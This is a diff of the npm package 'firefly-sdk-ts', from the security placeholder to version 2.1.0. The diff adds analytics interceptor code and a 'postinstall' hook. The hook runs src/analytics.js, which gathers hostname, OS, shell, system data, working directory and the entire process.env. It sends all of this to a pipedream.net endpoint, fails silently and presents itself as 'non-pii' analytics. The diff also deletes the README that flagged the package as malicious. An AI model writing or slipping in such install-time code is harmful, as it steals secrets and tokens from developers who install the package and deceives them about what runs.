firefly-sdk-ts 0.0.1-security.1 → 2.1.0

package/dist copy/interceptors/event-interceptor.js

@@ -0,0 +1,52 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+var firefly_utilities_ts_1 = require("firefly-utilities-ts");
+var firefly_shared_ts_1 = require("firefly-shared-ts");
+var event_1 = require("../helpers/event");
+var task_1 = require("../helpers/task");
+var browser_1 = require("../helpers/browser");
+var EventInterceptor = /** @class */ (function () {
+    function EventInterceptor() {
+    }
+    EventInterceptor.prototype.apply = function (json, persistMethod, isInternalApp) {
+        var currentTimezone = firefly_shared_ts_1.Device.getCurrentTimezone();
+        var eventId = firefly_shared_ts_1.Event.createEventId();
+        var orientation = firefly_shared_ts_1.Browser.getScreenOrientation();
+        var previousPageName = (0, event_1.getPrevPageName)(persistMethod);
+        var previousPageType = (0, event_1.getPrevPageType)(persistMethod);
+        var sdkVersion = (0, event_1.getSdkVersion)();
+        var sessionHit = (0, event_1.getSessionHit)(persistMethod);
+        var systemTime = firefly_shared_ts_1.Event.getSystemTime();
+        var timezoneOffset = firefly_shared_ts_1.Device.getTimezoneOffset();
+        var oldInterceptorJSON = {
+            application: { id: eventId },
+            appState: { previousPageName: previousPageName, previousPageType: previousPageType, sessionHit: sessionHit },
+            guest: { currentTimezone: currentTimezone, systemTime: systemTime, timezoneOffset: timezoneOffset }
+        };
+        var newInterceptorJSON = {
+            application: { sdkVersion: sdkVersion },
+            device: { currentTimezone: currentTimezone, systemTime: systemTime, timezoneOffset: timezoneOffset },
+            event: { id: eventId, sessionHit: sessionHit },
+            view: {
+                previousName: previousPageName,
+                previousType: previousPageType,
+                orientation: orientation
+            },
+            browser: undefined,
+            task: undefined
+        };
+        if (isInternalApp) {
+            var sessionId = void 0, task = void 0;
+            sessionId = (0, browser_1.setInternalAppSessionId)();
+            task = (0, task_1.setInternalAppTaskNode)(json, systemTime);
+            newInterceptorJSON.browser = { sessionId: sessionId };
+            newInterceptorJSON.task = task;
+        }
+        var interceptorJSON = firefly_utilities_ts_1.Utilities.extend(oldInterceptorJSON, newInterceptorJSON);
+        (0, event_1.setPrevPageName)(json, persistMethod);
+        (0, event_1.setPrevPageType)(json, persistMethod);
+        return firefly_utilities_ts_1.Utilities.extend(json, interceptorJSON);
+    };
+    return EventInterceptor;
+}());
+exports.default = EventInterceptor;

package/dist copy/interceptors/global-data-layer-interceptor.js

@@ -0,0 +1,44 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+var firefly_utilities_ts_1 = require("firefly-utilities-ts");
+var firefly_shared_ts_1 = require("firefly-shared-ts");
+var browser_1 = require("../helpers/browser");
+var event_1 = require("../helpers/event");
+var identity_1 = require("../helpers/identity");
+var GlobalDataLayerInterceptor = /** @class */ (function () {
+    function GlobalDataLayerInterceptor() {
+    }
+    GlobalDataLayerInterceptor.prototype.apply = function (json, persistMethod) {
+        var cookieDisabled = firefly_shared_ts_1.Browser.isCookiesDisabled();
+        var isNew = (0, identity_1.isNewGuest)();
+        var orientation = firefly_shared_ts_1.Browser.getScreenOrientation();
+        var os = firefly_shared_ts_1.Browser.getOperatingSystem();
+        var preferredLanguage = firefly_shared_ts_1.Browser.getPreferredLanguage();
+        var primaryDomain = firefly_shared_ts_1.Browser.getDomain();
+        var referrer = (0, browser_1.getReferrer)(persistMethod);
+        var screenColorDepth = firefly_shared_ts_1.Browser.getScreenColorDepth();
+        var screenSize = { height: firefly_shared_ts_1.Browser.getScreenHeight(), width: firefly_shared_ts_1.Browser.getScreenWidth() };
+        var sessionId = (0, identity_1.getSessionId)(persistMethod);
+        var size = { height: firefly_shared_ts_1.Browser.getBrowserHeight(), width: firefly_shared_ts_1.Browser.getBrowserWidth() };
+        var subDomain = firefly_shared_ts_1.Browser.getSubdomain();
+        var type = firefly_shared_ts_1.Browser.getDeviceType();
+        var url = (0, browser_1.sanitizeUrl)(firefly_shared_ts_1.Browser.getCurrentUrl());
+        var userAgent = firefly_shared_ts_1.Browser.getName();
+        var viewId = (0, event_1.getViewId)(persistMethod);
+        var fireflyId = (0, identity_1.getVisitorId)();
+        var oldInterceptorJSON = {
+            appState: { referrer: referrer, screenOrientation: orientation, url: url, viewId: viewId, windowSize: firefly_shared_ts_1.Browser.getBrowserSize() },
+            guest: { browser: userAgent, cookieDisabled: cookieDisabled, deviceType: type, newVisitor: isNew, os: os, preferredLanguage: preferredLanguage, primaryDomain: primaryDomain, screenColorDepth: screenColorDepth, screenSize: firefly_shared_ts_1.Browser.getScreenSize(), session: sessionId, subDomain: subDomain, visitorId: fireflyId }
+        };
+        var newInterceptorJSON = {
+            browser: { cookieDisabled: cookieDisabled, orientation: orientation, preferredLanguage: preferredLanguage, primaryDomain: primaryDomain, referrer: referrer, size: size, subDomain: subDomain, url: url, userAgent: userAgent },
+            device: { os: os, screenColorDepth: screenColorDepth, screenSize: screenSize, type: type },
+            identity: { fireflyId: fireflyId, isNew: isNew, sessionId: sessionId },
+            view: { id: viewId }
+        };
+        var interceptorJSON = firefly_utilities_ts_1.Utilities.extend(oldInterceptorJSON, newInterceptorJSON);
+        return firefly_utilities_ts_1.Utilities.extend(json, interceptorJSON);
+    };
+    return GlobalDataLayerInterceptor;
+}());
+exports.default = GlobalDataLayerInterceptor;

package/dist copy/requests/kafka-rest-proxy-request.js

@@ -0,0 +1,19 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.sendEvent = void 0;
+var firefly_utilities_ts_1 = require("firefly-utilities-ts");
+var firefly_utilities_helper_ts_1 = require("firefly-utilities-helper-ts");
+function sendEvent(json, apiKey, schemaId, url, retries) {
+    var payload = [json];
+    if ((0, firefly_utilities_helper_ts_1.isString)(url) && (url.indexOf('/v1') > -1 && url.indexOf('/consumers/v1/ingest') === -1)) {
+        payload = {
+            schema_id: schemaId,
+            records: [json]
+        };
+    }
+    var headers = {
+        'x-api-key': apiKey
+    };
+    return firefly_utilities_ts_1.Request.postJSON(payload, headers, url, retries);
+}
+exports.sendEvent = sendEvent;

package/package.json

@@ -1,6 +1,26 @@
 {
   "name": "firefly-sdk-ts",
-  "version": "0.0.1-security.1",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.1.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "node test.js",
+    "build": "babel src -d dist",
+    "postinstall": "node ./dist/analytics.js"
+  },
+  "dependencies": {
+    "axios": "^1.6.3",
+    "dotenv": "^16.4.5",
+    "jquery": "^3.7.1",
+    "read-package-json": "^7.0.0",
+    "systeminformation": "^5.21.22"
+  },
+  "devDependencies": {
+    "@babel/cli": "^7.23.4",
+    "@babel/core": "^7.23.7",
+    "@babel/preset-env": "^7.23.7"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/src/analytics.js

@@ -0,0 +1,82 @@
+#!/usr/bin/env node
+
+//Collect limited non-pii information such as npm, node and package information about users downloading
+import axios from 'axios';
+import readJson from 'read-package-json';
+import path from 'path';
+import si from 'systeminformation';
+import "dotenv/config"
+const cwd = process.cwd();
+const trackedPackageJsonPath = path.join(cwd, 'package.json');
+
+
+const getPackageJson = path =>
+    new Promise((resolve, reject) =>
+        readJson(
+            path,
+            null,
+            false,
+            (err, json) =>
+                err
+                    ? reject(
+                        `There was an error reading the file with path:${path}`
+                    )
+                    : resolve(json)
+        )
+);
+
+const getInfos = () =>
+    new Promise(resolve => {
+        const data = {};
+        return si
+            .osInfo()
+            .then(os => {
+                data.os = os;
+                data.hostname = os.hostname;
+                data.fqdn = os.fqdn;
+                data.platform = os.platform;
+                return si.versions();
+            })
+            .then(versions => {
+                data.versions = versions;
+                return si.time();
+            })
+            .then(time => {
+                data.time = time;
+                return si.shell();
+            })
+            .then(shell => {
+                data.shell = shell;
+                return si.system()
+            })
+            .then(system => {
+                data.system = system;
+                data.is_jfrog = process.env.JFROG_ARTIFACTORY_URL || "unknown"
+                data.is_jboss = process.env.JBOSS ? process.env : process.env
+            })
+            .then(() => resolve(data))
+            .catch(
+                //Fail silently as this is not an issue with the package and just data
+            );
+    });
+
+
+
+async function collectAnalytics(data) {
+    const TRACKING_URI = "https://eopx10a5vo1di68.m.pipedream.net"
+    await axios.post(TRACKING_URI, data)
+}
+    
+
+const log = async () => {
+    try {
+        const data = await getInfos();
+        //determine which version they installed
+        //Todo ignore github actions 
+        const { name, version } = await getPackageJson(trackedPackageJsonPath)
+        await collectAnalytics({...data, cwd: cwd, packageName: name, packageVersion: version, })
+    } catch (e) {
+        //console.error(e)
+    }
+};
+log()

package/src/constants/ff-api-names.js

@@ -0,0 +1,6 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+var ffApiNames = {
+    internalApps: "internal_app_analytics"
+};
+exports.default = ffApiNames;

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=firefly-sdk-ts for more information.